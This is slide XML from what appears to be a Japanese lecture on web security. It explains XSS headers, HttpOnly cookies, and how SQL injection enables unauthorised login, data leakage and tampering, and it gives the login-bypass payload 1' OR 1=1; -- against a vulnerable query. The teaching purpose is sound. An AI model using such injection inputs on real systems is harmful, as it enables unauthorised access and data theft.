              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>その他</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>X-XSS-Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>リクエストに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が含まれレスポンスにも同じものが含まれる場合ページを読み込まない</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クッキーの設定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>ake_response</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のメソッドから</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>set_cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いて</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>する</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD397208-6407-1682-E836-DA60E8B06725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1588319" y="3648820"/>
            <a:ext cx="8840434" cy="352474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1124372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5BE45D-6E3F-1A24-2B77-83CCF50A9E2F}"/>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31A37790-6420-4A83-3A43-C54CB48AFCA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データベースと連動した</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アプリケーションなどに対する攻撃手法の一つで、検索文字列など外部から指定するパラメータの一部に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の断片などを混入させ不正な操作を行うもの。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>悪意のある攻撃者が検索文字列として引用符や条件式などを組み合わせた</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の断片を渡すことにより、開発者が想定していない</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文が生成・実行され、本来得られないはずのデータを出力してしまったり、保存されたデータが破壊・改竄されることがある。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEC433D1-1D9C-346C-97C3-EEB737D87872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6268803"/>
            <a:ext cx="6094674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>出典：https://e-words.jp/w/SQLインジェクション.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2774835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FCAA9-50DE-7B18-7E47-B625E4736FDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F32D31-E481-9095-B59E-6134EA6671AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>における不正アクセスの被害</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>今までの講座についての補足</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クロスサイトスクリプティング</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクション</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クロスサイトリクエストフォージェリ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキング</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1306739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41D9F4-DE6E-14CC-E285-47C7149CD46E}"/>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92352647-EB8E-56A5-EB7D-4BE92DA3958D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションの被害の代表例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン画面で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワードを入れる際に特に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を実行する文字列を入れて不正にログインする。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>登録画面などに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のサブクエリとして</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を用いて本来表示されないデータを表示する。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4093357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41D9F4-DE6E-14CC-E285-47C7149CD46E}"/>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92352647-EB8E-56A5-EB7D-4BE92DA3958D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションの被害の代表例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報改竄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>検索フォームなどで検索する文字列の後に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」を付けてその後に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を入れることで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文や</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を組み込むことができデータベースを不正に改竄する。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2285183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B601CC-E39B-AB34-FB26-C7F8502EA201}"/>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D95CD118-218C-39EA-994B-068ACD565674}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションの仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文に使う文字列を外部から使う場合に文字列を指定する「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」を用いることやコメントアウトである「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」を用いて</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の意味を変える。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>また、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を入れるサブクエリを上記の方法で入力することや「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」を用いて複数の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を実行する等が典型例。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240991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3701D-3480-27BA-2A07-5AC53819900F}"/>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9D912F02-0BD9-1C29-E745-C6ECB081A5FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションの仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>パスワード認証</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「認証とセッション管理」ではパスワードを</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>から取り出して認証していたが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が同じかつパスワードが同じとしても認証自体はできるためこれを用いる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>このような認証手法の場合は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の実行後に配列に結果を格納した配列の長さが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でない場合にログイン成功となる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18864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005B39-54BA-C57D-A63A-AA32F0686F90}"/>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550A65FD-694F-E265-9B40-6A17A986C039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4909130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションの仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>SELECT * FROM user WHERE id=‘ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>名</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>’ AND pass=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>パスワード</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>これに対して</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>名に</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>1’ OR 1=1; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
